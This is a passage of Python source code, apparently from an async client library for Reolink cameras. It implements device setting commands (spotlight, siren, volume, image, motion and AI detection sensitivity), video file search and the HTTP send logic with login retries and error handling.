\"\"\"Stub to handle setting the time period where spotlight (WhiteLed) will be on when NightMode set and AUTO is off.\n Time in 24-hours format\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_spotlight_lighting_schedule: no camera connected to channel '{channel}'\")\n if channel not in self._whiteled_settings or not self._whiteled_settings[channel]:\n raise NotSupportedError(f\"set_spotlight_lighting_schedule: White Led on camera {self.camera_name(channel)} is not available\")\n\n if (\n endhour < 0\n or endhour > 23\n or endmin < 0\n or endmin > 59\n or starthour < 0\n or starthour > 23\n or startmin < 0\n or startmin > 59\n or (endhour == starthour and endmin < startmin)\n or (not (endhour < 12 and starthour > 16) and (endhour < starthour))\n ):\n raise InvalidParameterError(\n f\"set_spotlight_lighting_schedule: Parameter error on camera {self.camera_name(channel)} start time: {starthour}:{startmin}, end time: {endhour}:{endmin}\"\n )\n\n body = [\n {\n \"cmd\": \"SetWhiteLed\",\n \"param\": {\n \"WhiteLed\": {\n \"LightingSchedule\": {\n \"EndHour\": endhour,\n \"EndMin\": endmin,\n \"StartHour\": starthour,\n \"StartMin\": startmin,\n },\n \"channel\": channel,\n \"mode\": 3,\n }\n },\n }\n ]\n\n await self.send_setting(body)\n\n async def set_spotlight(self, channel: int, enable: bool) -> None:\n \"\"\"Simply calls set_whiteled with brightness 100, mode 3 after setting lightning schedule to on all the time 0000 to 2359.\"\"\"\n if enable:\n await self.set_spotlight_lighting_schedule(channel, 23, 59, 0, 0)\n await self.set_whiteled(channel, enable, 100, 3)\n return\n\n await self.set_spotlight_lighting_schedule(channel, 0, 0, 0, 0)\n await self.set_whiteled(channel, enable, 100, 1)\n\n async def set_volume(self, channel: int, volume: int | None = None, doorbell_button_sound: bool | None = None) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_volume: no camera connected to channel '{channel}'\")\n if volume is not None:\n if not self.supported(channel, \"volume\"):\n raise NotSupportedError(f\"set_volume: Volume control on camera {self.camera_name(channel)} is not available\")\n if not isinstance(volume, int):\n raise InvalidParameterError(f\"set_volume: volume {volume} not integer\")\n if volume < 0 or volume > 100:\n raise InvalidParameterError(f\"set_volume: volume {volume} not in range 0...100\")\n if doorbell_button_sound is not None:\n if not self.supported(channel, \"doorbell_button_sound\"):\n raise NotSupportedError(f\"set_volume: Doorbell button sound control on camera {self.camera_name(channel)} is not available\")\n if not isinstance(doorbell_button_sound, bool):\n raise InvalidParameterError(f\"set_volume: doorbell_button_sound {doorbell_button_sound} not boolean\")\n\n params = {\"channel\": channel}\n if volume is not None:\n params[\"volume\"] = volume\n if doorbell_button_sound is not None:\n params[\"visitorLoudspeaker\"] = 1 if doorbell_button_sound else 0\n\n body = [{\"cmd\": \"SetAudioCfg\", \"action\": 0, \"param\": {\"AudioCfg\": params}}]\n await self.send_setting(body)\n\n async def set_quick_reply(self, channel: int, enable: bool | None = None, file_id: int | None = None, time: int | None = None) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_quick_reply: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"quick_reply\"):\n raise NotSupportedError(f\"set_quick_reply: Quick reply on camera {self.camera_name(channel)} is not 
available\")\n if file_id is not None and not isinstance(file_id, int):\n raise InvalidParameterError(f\"set_quick_reply: file_id {file_id} not integer\")\n if file_id is not None and file_id not in self.quick_reply_dict(channel):\n raise InvalidParameterError(f\"set_quick_reply: file_id {file_id} not in {list(self.quick_reply_dict(channel))}\")\n if time is not None and not isinstance(time, int):\n raise InvalidParameterError(f\"set_quick_reply: time {time} not integer\")\n if time is not None and time < 0:\n raise InvalidParameterError(f\"set_quick_reply: time {time} can not be < 0\")\n\n params: dict[str, Any] = {\"channel\": channel}\n if enable is not None:\n if enable:\n params[\"enable\"] = 1\n current_file_id = self.quick_reply_file(channel)\n if current_file_id == -1:\n current_file_id = list(self.quick_reply_dict(channel))[1]\n params[\"fileId\"] = current_file_id\n else:\n params[\"enable\"] = 0\n if file_id is not None:\n if file_id >= 0:\n params[\"enable\"] = 1\n params[\"fileId\"] = file_id\n else:\n params[\"enable\"] = 0\n if time is not None:\n params[\"timeout\"] = time\n\n body = [{\"cmd\": \"SetAutoReply\", \"action\": 0, \"param\": {\"AutoReply\": params}}]\n await self.send_setting(body)\n\n async def set_audio_alarm(self, channel: int, enable: bool) -> None:\n # fairly basic only either turns it off or on\n # called in its simple form by set_siren\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_audio_alarm: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"siren\"):\n raise NotSupportedError(f\"set_audio_alarm: AudioAlarm on camera {self.camera_name(channel)} is not available\")\n\n if self.api_version(\"GetAudioAlarm\") >= 1:\n body = [{\"cmd\": \"SetAudioAlarmV20\", \"param\": {\"Audio\": {\"enable\": 1 if enable else 0, \"schedule\": {\"channel\": channel}}}}]\n else:\n body = [\n {\n \"cmd\": \"SetAudioAlarm\",\n \"param\": {\n \"Audio\": {\n \"schedule\": {\n \"enable\": 1 if enable else 0,\n \"channel\": channel,\n }\n }\n },\n }\n ]\n\n await self.send_setting(body)\n\n async def set_siren(self, channel: int, enable: bool = True, duration: int | None = 2) -> None:\n # Uses API AudioAlarmPlay with manual switch\n # uncertain if there may be a glitch - dont know if there is API I have yet to find\n # which sets AudioLevel\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_siren: no camera connected to channel '{channel}'\")\n if duration is not None and not isinstance(duration, int):\n raise InvalidParameterError(f\"set_siren: duration '{duration}' is not integer\")\n if not self.supported(channel, \"siren_play\"):\n raise NotSupportedError(f\"set_siren: AudioAlarmPlay on camera {self.camera_name(channel)} is not available\")\n\n if enable:\n if duration is not None:\n params = {\n \"alarm_mode\": \"times\",\n \"times\": duration,\n \"channel\": channel,\n }\n else:\n params = {\n \"alarm_mode\": \"manul\",\n \"manual_switch\": 1,\n \"channel\": channel,\n }\n else:\n params = {\n \"alarm_mode\": \"manul\",\n \"manual_switch\": 0,\n \"channel\": channel,\n }\n\n body = [\n {\n \"cmd\": \"AudioAlarmPlay\",\n \"action\": 0,\n \"param\": params,\n }\n ]\n\n await self.send_setting(body)\n\n async def set_daynight(self, channel: int, value: str) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_daynight: no camera connected to channel '{channel}'\")\n await self.get_state(cmd=\"GetIsp\")\n if channel not in self._isp_settings or not 
self._isp_settings[channel]:\n raise NotSupportedError(f\"set_daynight: ISP on camera {self.camera_name(channel)} is not available\")\n\n val_list = [val.value for val in DayNightEnum]\n if value not in val_list:\n raise InvalidParameterError(f\"set_daynight: value {value} not in {val_list}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetIsp\", \"action\": 0, \"param\": self._isp_settings[channel]}]\n body[0][\"param\"][\"Isp\"][\"dayNight\"] = value\n\n await self.send_setting(body)\n\n async def set_backlight(self, channel: int, value: str) -> None:\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_backlight: no camera connected to channel '{channel}'\")\n await self.get_state(cmd=\"GetIsp\")\n if channel not in self._isp_settings or not self._isp_settings[channel]:\n raise NotSupportedError(f\"set_backlight: ISP on camera {self.camera_name(channel)} is not available\")\n\n if value not in [\"BackLightControl\", \"DynamicRangeControl\", \"Off\"]:\n raise InvalidParameterError(f\"set_backlight: value {value} not in ['BackLightControl', 'DynamicRangeControl', 'Off']\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetIsp\", \"action\": 0, \"param\": self._isp_settings[channel]}]\n body[0][\"param\"][\"Isp\"][\"backLight\"] = value\n\n await self.send_setting(body)\n\n async def set_motion_detection(self, channel: int, enable: bool) -> None:\n \"\"\"Set the motion detection parameter.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_motion_detection: no camera connected to channel '{channel}'\")\n if channel not in self._md_alarm_settings:\n raise NotSupportedError(f\"set_motion_detection: alarm on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAlarm\", \"action\": 0, \"param\": self._md_alarm_settings[channel]}]\n body[0][\"param\"][\"Alarm\"][\"enable\"] = 1 if enable else 0\n\n await self.send_setting(body)\n\n async def set_md_sensitivity(self, channel: int, value: int) -> None:\n \"\"\"Set motion detection sensitivity.\n Here the camera web and windows application show a completely different value than set.\n So the calculation <51 - value> makes the \"real\" value.\n \"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_md_sensitivity: no camera connected to channel '{channel}'\")\n if channel not in self._md_alarm_settings:\n raise NotSupportedError(f\"set_md_sensitivity: md sensitivity on camera {self.camera_name(channel)} is not available\")\n if not isinstance(value, int):\n raise InvalidParameterError(f\"set_md_sensitivity: sensitivity '{value}' is not integer\")\n if value < 1 or value > 50:\n raise InvalidParameterError(f\"set_md_sensitivity: sensitivity {value} not in range 1...50\")\n\n body: typings.reolink_json\n if self.api_version(\"GetMdAlarm\") >= 1:\n body = [{\"cmd\": \"SetMdAlarm\", \"action\": 0, \"param\": {\"MdAlarm\": {\"channel\": channel, \"useNewSens\": 1, \"newSens\": {\"sensDef\": int(51 - value)}}}}]\n else:\n body = [\n {\n \"cmd\": \"SetAlarm\",\n \"action\": 0,\n \"param\": {\n \"Alarm\": {\n \"channel\": channel,\n \"type\": \"md\",\n \"sens\": self._md_alarm_settings[channel][\"Alarm\"][\"sens\"],\n }\n },\n }\n ]\n for setting in body[0][\"param\"][\"Alarm\"][\"sens\"]:\n setting[\"sensitivity\"] = int(51 - value)\n\n await self.send_setting(body)\n\n async def set_ai_sensitivity(self, channel: int, value: int, ai_type: str) -> None:\n \"\"\"Set AI detection sensitivity.\"\"\"\n if channel not in self._channels:\n 
raise InvalidParameterError(f\"set_ai_sensitivity: no camera connected to channel '{channel}'\")\n if channel not in self._ai_alarm_settings:\n raise NotSupportedError(f\"set_ai_sensitivity: ai sensitivity on camera {self.camera_name(channel)} is not available\")\n if not isinstance(value, int):\n raise InvalidParameterError(f\"set_ai_sensitivity: sensitivity '{value}' is not integer\")\n if value < 0 or value > 100:\n raise InvalidParameterError(f\"set_ai_sensitivity: sensitivity {value} not in range 0...100\")\n if ai_type not in self.ai_supported_types(channel):\n raise InvalidParameterError(f\"set_ai_sensitivity: ai type '{ai_type}' not supported for channel {channel}, suppored types are {self.ai_supported_types(channel)}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAiAlarm\", \"action\": 0, \"param\": {\"AiAlarm\": {\"channel\": channel, \"ai_type\": ai_type, \"sensitivity\": value}}}]\n await self.send_setting(body)\n\n async def set_ai_delay(self, channel: int, value: int, ai_type: str) -> None:\n \"\"\"Set AI detection delay time in seconds.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ai_delay: no camera connected to channel '{channel}'\")\n if channel not in self._ai_alarm_settings:\n raise NotSupportedError(f\"set_ai_delay: ai delay on camera {self.camera_name(channel)} is not available\")\n if not isinstance(value, int):\n raise InvalidParameterError(f\"set_ai_delay: delay '{value}' is not integer\")\n if value < 0 or value > 8:\n raise InvalidParameterError(f\"set_ai_delay: delay {value} not in range 0...8\")\n if ai_type not in self.ai_supported_types(channel):\n raise InvalidParameterError(f\"set_ai_delay: ai type '{ai_type}' not supported for channel {channel}, suppored types are {self.ai_supported_types(channel)}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAiAlarm\", \"action\": 0, \"param\": {\"AiAlarm\": {\"channel\": channel, \"ai_type\": ai_type, \"stay_time\": value}}}]\n await self.send_setting(body)\n\n async def set_image(\n self, channel: int, bright: int | None = None, contrast: int | None = None, saturation: int | None = None, hue: int | None = None, sharpen: int | None = None\n ) -> None:\n \"\"\"Set image adjustments.\"\"\"\n _image = {\"Image\": {\"channel\": channel}}\n\n if bright is not None:\n if not self.supported(channel, \"isp_bright\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(bright, int):\n raise InvalidParameterError(f\"set_image: bright '{bright}' is not integer\")\n if bright < 0 or bright > 255:\n raise InvalidParameterError(f\"set_image: bright {bright} not in range 0...255\")\n _image[\"Image\"][\"bright\"] = bright\n\n if contrast is not None:\n if not self.supported(channel, \"isp_contrast\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(contrast, int):\n raise InvalidParameterError(f\"set_image: contrast '{contrast}' is not integer\")\n if contrast < 0 or contrast > 255:\n raise InvalidParameterError(f\"set_image: contrast {contrast} not in range 0...255\")\n _image[\"Image\"][\"contrast\"] = contrast\n\n if saturation is not None:\n if not self.supported(channel, \"isp_satruation\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(saturation, int):\n raise InvalidParameterError(f\"set_image: saturation '{saturation}' is not integer\")\n if saturation < 0 
or saturation > 255:\n raise InvalidParameterError(f\"set_image: saturation {saturation} not in range 0...255\")\n _image[\"Image\"][\"saturation\"] = saturation\n\n if hue is not None:\n if not self.supported(channel, \"isp_hue\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(hue, int):\n raise InvalidParameterError(f\"set_image: hue '{hue}' is not integer\")\n if hue < 0 or hue > 255:\n raise InvalidParameterError(f\"set_image: hue {hue} not in range 0...255\")\n _image[\"Image\"][\"hue\"] = hue\n\n if sharpen is not None:\n if not self.supported(channel, \"isp_sharpen\"):\n raise NotSupportedError(f\"set_image: bright on camera {self.camera_name(channel)} is not available\")\n if not isinstance(sharpen, int):\n raise InvalidParameterError(f\"set_image: sharpen '{sharpen}' is not integer\")\n if sharpen < 0 or sharpen > 255:\n raise InvalidParameterError(f\"set_image: sharpen {sharpen} not in range 0...255\")\n _image[\"Image\"][\"sharpen\"] = sharpen\n\n body: typings.reolink_json = [{\"cmd\": \"SetImage\", \"param\": _image}]\n await self.send_setting(body)\n\n async def request_vod_files(\n self,\n channel: int,\n start: datetime,\n end: datetime,\n status_only: bool = False,\n stream: Optional[str] = None,\n ) -> tuple[list[typings.VOD_search_status], list[typings.VOD_file]]:\n \"\"\"Send search VOD-files command.\"\"\"\n if channel not in self._stream_channels:\n raise InvalidParameterError(f\"Request VOD files: no camera connected to channel '{channel}'\")\n\n if stream is None:\n stream = self._stream\n\n body = [\n {\n \"cmd\": \"Search\",\n \"action\": 0,\n \"param\": {\n \"Search\": {\n \"channel\": channel,\n \"onlyStatus\": 1 if status_only else 0,\n \"streamType\": stream,\n \"StartTime\": datetime_to_reolink_time(start),\n \"EndTime\": datetime_to_reolink_time(end),\n }\n },\n }\n ]\n\n try:\n json_data = await self.send(body, {\"cmd\": \"Search\"}, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Request VOD files error: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Request VOD files error: {str(err)}\") from err\n\n if json_data[0].get(\"code\", -1) != 0:\n raise ApiError(f\"Host: {self._host}:{self._port}: Request VOD files: API returned error code {json_data[0].get('code', -1)}, response: {json_data}\")\n\n search_result = json_data[0].get(\"value\", {}).get(\"SearchResult\", {})\n if \"Status\" not in search_result:\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: Request VOD files: no 'Status' in the response: {json_data}\")\n\n statuses = [typings.VOD_search_status(status) for status in search_result[\"Status\"]]\n if status_only:\n return statuses, []\n\n if \"File\" not in search_result:\n # When there are now recordings available in the indicated time window, \"File\" will not be in the response.\n return statuses, []\n\n return statuses, [typings.VOD_file(file, self.timezone()) for file in search_result[\"File\"]]\n\n async def send_setting(self, body: typings.reolink_json, wait_before_get: int = 0) -> None:\n command = body[0][\"cmd\"]\n _LOGGER.debug(\n 'Sending command: \"%s\" to: %s:%s with body: %s',\n command,\n self._host,\n self._port,\n body,\n )\n\n try:\n json_data = await self.send(body, {\"cmd\": command}, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Command '{command}': {str(err)}\") from err\n except 
NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error receiving response for command '{command}'\") from err\n\n _LOGGER.debug(\"Response from cmd '%s' from %s:%s: %s\", command, self._host, self._port, json_data)\n\n try:\n if json_data[0][\"code\"] != 0 or json_data[0].get(\"value\", {}).get(\"rspCode\", -1) != 200:\n _LOGGER.debug(\"ApiError for command '%s', response: %s\", command, json_data)\n rspCode = json_data[0].get(\"value\", json_data[0][\"error\"])[\"rspCode\"]\n detail = json_data[0].get(\"value\", json_data[0][\"error\"]).get(\"detail\", \"\")\n raise ApiError(f\"cmd '{command}': API returned error code {json_data[0]['code']}, response code {rspCode}/{detail}\")\n except KeyError as err:\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: received an unexpected response from command '{command}': {json_data}\") from err\n\n if command[:3] == \"Set\":\n getcmd = command.replace(\"Set\", \"Get\")\n if wait_before_get > 0:\n await asyncio.sleep(wait_before_get)\n await self.get_state(cmd=getcmd)\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"json\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> typings.reolink_json:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"image/jpeg\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> bytes:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"text/html\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> str:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"application/octet-stream\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> aiohttp.ClientResponse:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"json\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> typings.reolink_json:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"image/jpeg\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> bytes:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"text/html\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> str:\n ...\n\n @overload\n async def send(\n self,\n body: typings.reolink_json,\n *,\n expected_response_type: Literal[\"application/octet-stream\"],\n retry: int = RETRY_ATTEMPTS,\n ) -> aiohttp.ClientResponse:\n ...\n\n async def send(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None = None,\n expected_response_type: Literal[\"json\", \"image/jpeg\", \"text/html\", \"application/octet-stream\"] = \"json\",\n retry: int = RETRY_ATTEMPTS,\n ) -> typings.reolink_json | bytes | str | aiohttp.ClientResponse:\n \"\"\"\n If a body contains more than MAX_CHUNK_ITEMS requests, split it up in chunks.\n Otherwise you get a 'error': {'detail': 'send failed', 'rspCode': -16} response.\n \"\"\"\n len_body = len(body)\n if len_body <= MAX_CHUNK_ITEMS or expected_response_type != \"json\":\n return await self.send_chunk(body, param, expected_response_type, retry)\n\n response: typings.reolink_json = []\n for chunk in range(0, len_body, MAX_CHUNK_ITEMS):\n chunk_end = min(chunk + MAX_CHUNK_ITEMS, len_body)\n _LOGGER.debug(\"sending chunks %i:%i of total %i requests\", chunk + 1, chunk_end, 
len_body)\n response.extend(await self.send_chunk(body[chunk:chunk_end], param, expected_response_type, retry))\n\n return response\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"json\"],\n retry: int,\n ) -> typings.reolink_json:\n ...\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"image/jpeg\"],\n retry: int,\n ) -> bytes:\n ...\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"text/html\"],\n retry: int,\n ) -> str:\n ...\n\n @overload\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"application/octet-stream\"],\n retry: int,\n ) -> aiohttp.ClientResponse:\n ...\n\n async def send_chunk(\n self,\n body: typings.reolink_json,\n param: dict[str, Any] | None,\n expected_response_type: Literal[\"json\", \"image/jpeg\", \"text/html\", \"application/octet-stream\"],\n retry: int,\n ) -> typings.reolink_json | bytes | str | aiohttp.ClientResponse:\n \"\"\"Generic send method.\"\"\"\n retry = retry - 1\n\n if expected_response_type in [\"image/jpeg\", \"application/octet-stream\"]:\n cur_command = \"\" if param is None else param.get(\"cmd\", \"\")\n is_login_logout = False\n else:\n cur_command = \"\" if len(body) == 0 else body[0].get(\"cmd\", \"\")\n is_login_logout = cur_command in [\"Login\", \"Logout\"]\n\n if not is_login_logout:\n await self.login()\n\n if not param:\n param = {}\n if cur_command == \"Login\":\n param[\"token\"] = \"null\"\n elif self._token is not None:\n param[\"token\"] = self._token\n\n _LOGGER.debug(\"%s/%s:%s::send() HTTP Request params =\\n%s\\n\", self.nvr_name, self._host, self._port, str(param).replace(self._password, \"\"))\n\n if self._aiohttp_session.closed:\n self._aiohttp_session = self._get_aiohttp_session()\n\n try:\n data: bytes | str\n if expected_response_type == \"image/jpeg\":\n async with self._send_mutex:\n response = await self._aiohttp_session.get(url=self._url, params=param, allow_redirects=False)\n\n data = await response.read() # returns bytes\n elif expected_response_type == \"application/octet-stream\":\n async with self._send_mutex:\n dl_timeout = aiohttp.ClientTimeout(connect=self.timeout, sock_read=self.timeout)\n response = await self._aiohttp_session.get(url=self._url, params=param, allow_redirects=False, timeout=dl_timeout)\n\n data = \"\" # Response will be a file and be large, pass the response instead of reading it here.\n else:\n _LOGGER.debug(\"%s/%s:%s::send() HTTP Request body =\\n%s\\n\", self.nvr_name, self._host, self._port, str(body).replace(self._password, \"\"))\n\n async with self._send_mutex:\n response = await self._aiohttp_session.post(url=self._url, json=body, params=param, allow_redirects=False)\n\n data = await response.text(encoding=\"utf-8\") # returns str\n\n _LOGGER.debug(\"%s/%s:%s::send() HTTP Response status = %s, content-type = (%s).\", self.nvr_name, self._host, self._port, response.status, response.content_type)\n if cur_command == \"Search\" and len(data) > 500:\n _LOGGER_DATA.debug(\"%s/%s:%s::send() HTTP Response (VOD search) data scrapped because it's too large.\", self.nvr_name, self._host, self._port)\n elif cur_command in [\"Snap\", \"Download\"]:\n _LOGGER_DATA.debug(\"%s/%s:%s::send() HTTP Response (snapshot/download) data scrapped 
because it's too large.\", self.nvr_name, self._host, self._port)\n else:\n _LOGGER_DATA.debug(\"%s/%s:%s::send() HTTP Response data:\\n%s\\n\", self.nvr_name, self._host, self._port, data)\n\n if len(data) < 500 and response.content_type == \"text/html\":\n if isinstance(data, bytes):\n login_err = b'\"detail\" : \"invalid user\"' in data or b'\"detail\" : \"login failed\"' in data or b'detail\" : \"please login first' in data\n else:\n login_err = (\n '\"detail\" : \"invalid user\"' in data or '\"detail\" : \"login failed\"' in data or 'detail\" : \"please login first' in data\n ) and cur_command != \"Logout\"\n if login_err:\n response.release()\n if is_login_logout:\n raise CredentialsInvalidError()\n\n if retry <= 0:\n raise CredentialsInvalidError()\n _LOGGER.debug(\n 'Host %s:%s: \"invalid login\" response, trying to login again and retry the command.',\n self._host,\n self._port,\n )\n await self.expire_session()\n return await self.send(body, param, expected_response_type, retry)\n\n expected_content_type: str = expected_response_type\n if expected_response_type == \"json\":\n expected_content_type = \"text/html\"\n # Reolink typo \"apolication/octet-stream\" instead of \"application/octet-stream\"\n if response.content_type not in [expected_content_type, \"apolication/octet-stream\"]:\n response.release()\n raise InvalidContentTypeError(f\"Expected type '{expected_content_type}' but received '{response.content_type}'\")\n\n if response.status == 502 and retry > 0:\n _LOGGER.debug(\"Host %s:%s: 502/Bad Gateway response, trying to login again and retry the command.\", self._host, self._port)\n response.release()\n await self.expire_session()\n return await self.send(body, param, expected_response_type, retry)\n\n if response.status >= 400 or (is_login_logout and response.status != 200):\n response.release()\n raise ApiError(f\"API returned HTTP status ERROR code {response.status}/{response.reason}\")\n\n if expected_response_type == \"json\" and isinstance(data, str):\n try:\n json_data = json_loads(data)\n except (TypeError, JSONDecodeError) as err:\n if retry <= 0:\n raise InvalidContentTypeError(\n f\"Error translating JSON response: {str(err)}, from commands {[cmd.get('cmd') for cmd in body]}, \"\n f\"content type '{response.content_type}', data:\\n{data}\\n\"\n ) from err\n _LOGGER.debug(\"Error translating JSON response: %s, trying again, data:\\n%s\\n\", str(err), data)\n await self.expire_session(unsubscribe=False)\n return await self.send(body, param, expected_response_type, retry)\n if json_data is None:\n await self.expire_session(unsubscribe=False)\n raise NoDataError(f\"Host {self._host}:{self._port}: returned no data: {data}\")\n return json_data\n\n if expected_response_type == \"image/jpeg\" and isinstance(data, bytes):\n return data\n\n if expected_response_type == \"text/html\" and isinstance(data, str):\n return data\n\n if expected_response_type == \"application/octet-stream\":\n # response needs to be read or released from the calling function\n return response\n\n response.release()\n raise InvalidContentTypeError(f\"Expected {expected_response_type}, unexpected data received: {data!r}\")\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n if retry <= 0:\n _LOGGER.debug(\"Host %s:%s: connection error: %s\", self._host, self._port, str(err))\n await self.expire_session()\n raise ReolinkConnectionError(f\"Host {self._host}:{self._port}: connection error: {str(err)}\") from err\n _LOGGER.debug(\"Host %s:%s: connection error, trying 
again: %s\", self._host, self._port, str(err))\n return await self.send(body, param, expected_response_type, retry)\n except asyncio.TimeoutError as err:\n if retry <= 0:\n _LOGGER.debug(\n \"Host %s:%s: connection timeout. Please check the connection to this host.\",\n self._host,\n self._port,\n )\n await self.expire_session()\n raise ReolinkTimeoutError(f\"Host {self._host}:{self._port}: Timeout error: {str(err)}\") from err\n _LOGGER.debug(\n \"Host %s:%s: connection timeout, trying again.\",\n self._host,\n self._port,\n )\n return await self.send(body, param, expected_response_type, retry)\n except RuntimeError as err:\n if self._aiohttp_session.closed and retry > 0:\n # catch RuntimeError(\"Session is closed\") from aiohttp, can happen due to async\n _LOGGER.debug(\"Host %s:%s: aiohttp session closed, retrying.\", self._host, self._port)\n return await self.send(body, param, expected_response_type, retry)\n _LOGGER.error('Host %s:%s: RuntimeError \"%s\" occurred, traceback:\\n%s\\n', self._host, self._port, str(err), traceback.format_exc())\n await self.expire_session()\n raise err\n except ApiError as err:\n _LOGGER.error(\"Host %s:%s: API error: %s.\", self._host, self._port, str(err))\n await self.expire_session(unsubscribe=False)\n raise err\n except CredentialsInvalidError as err:\n _LOGGER.error(\"Host %s:%s: login attempt failed.\", self._host, self._port)\n await self.expire_session()\n raise err\n except InvalidContentTypeError as err:\n _LOGGER.debug(\"Host %s:%s: content type error: %s.\", self._host, self._port, str(err))\n await self.expire_session(unsubscribe=False)\n raise err\n except Exception as err:\n _LOGGER.error('Host %s:%s: unknown exception \"%s\" occurred, traceback:\\n%s\\n', self._host, self._port, str(err), traceback.format_exc())\n await self.expire_session()\n raise err\n\n async def send_reolink_com(\n self,\n URL: str,\n expected_response_type: Literal[\"application/json\"] = \"application/json\",\n ) -> dict[str, Any]:\n \"\"\"Generic send method for reolink.com site.\"\"\"\n\n if self._aiohttp_session.closed:\n self._aiohttp_session = self._get_aiohttp_session()\n\n com_timeout = aiohttp.ClientTimeout(total=2 * self.timeout)\n try:\n response = await self._aiohttp_session.get(url=URL, timeout=com_timeout)\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n raise ReolinkConnectionError(f\"Connetion error to {URL}: {str(err)}\") from err\n except asyncio.TimeoutError as err:\n raise ReolinkTimeoutError(f\"Timeout requesting {URL}: {str(err)}\") from err\n\n if response.status != 200:\n response.release()\n raise ApiError(f\"Request to {URL} returned HTTP status ERROR code {response.status}/{response.reason}\")\n\n if response.content_type != expected_response_type:\n response.release()\n raise InvalidContentTypeError(f\"Request to {URL}, expected type '{expected_response_type}' but received '{response.content_type}'\")\n\n try:\n data = await response.text()\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n raise ReolinkConnectionError(f\"Connetion error reading response from {URL}: {str(err)}\") from err\n except asyncio.TimeoutError as err:\n raise ReolinkTimeoutError(f\"Timeout reading response from {URL}: {str(err)}\") from err\n\n try:\n json_data = json_loads(data)\n except (TypeError, JSONDecodeError) as err:\n raise InvalidContentTypeError(f\"Error translating JSON response: {str(err)}, from {URL}, \" f\"content type '{response.content_type}', data:\\n{data}\\n\") from err\n\n if 
json_data is None:\n raise NoDataError(f\"Request to {URL} returned no data: {data}\")\n\n resp_code = json_data.get(\"result\", {}).get(\"code\")\n if resp_code != 0:\n raise ApiError(f\"Request to {URL} returned error code {resp_code}, data:\\n{json_data}\")\n\n return json_data\n\n ##############################################################################\n # SUBSCRIPTION managing\n def renewtimer(self, sub_type: SubType = SubType.all) -> int:\n \"\"\"Return the renew time in seconds. Negative if expired.\"\"\"\n if sub_type == SubType.all:\n t_push = self.renewtimer(SubType.push)\n t_long_poll = self.renewtimer(SubType.long_poll)\n if t_long_poll == -1:\n return t_push\n if t_push == -1:\n return t_long_poll\n return min(t_push, t_long_poll)\n\n if sub_type not in self._subscription_time_difference or sub_type not in self._subscription_termination_time:\n return -1\n\n diff = self._subscription_termination_time[sub_type] - datetime.utcnow()\n return int(diff.total_seconds())\n\n def subscribed(self, sub_type: Literal[SubType.push, SubType.long_poll] = SubType.push) -> bool:\n return sub_type in self._subscription_manager_url and self.renewtimer(sub_type) > 0\n\n def convert_time(self, time) -> Optional[datetime]:\n \"\"\"Convert time object to printable.\"\"\"\n try:\n return datetime.strptime(time, \"%Y-%m-%dT%H:%M:%SZ\")\n except ValueError:\n return None\n\n async def calc_time_difference(self, local_time, remote_time) -> float:\n \"\"\"Calculate the time difference between local and 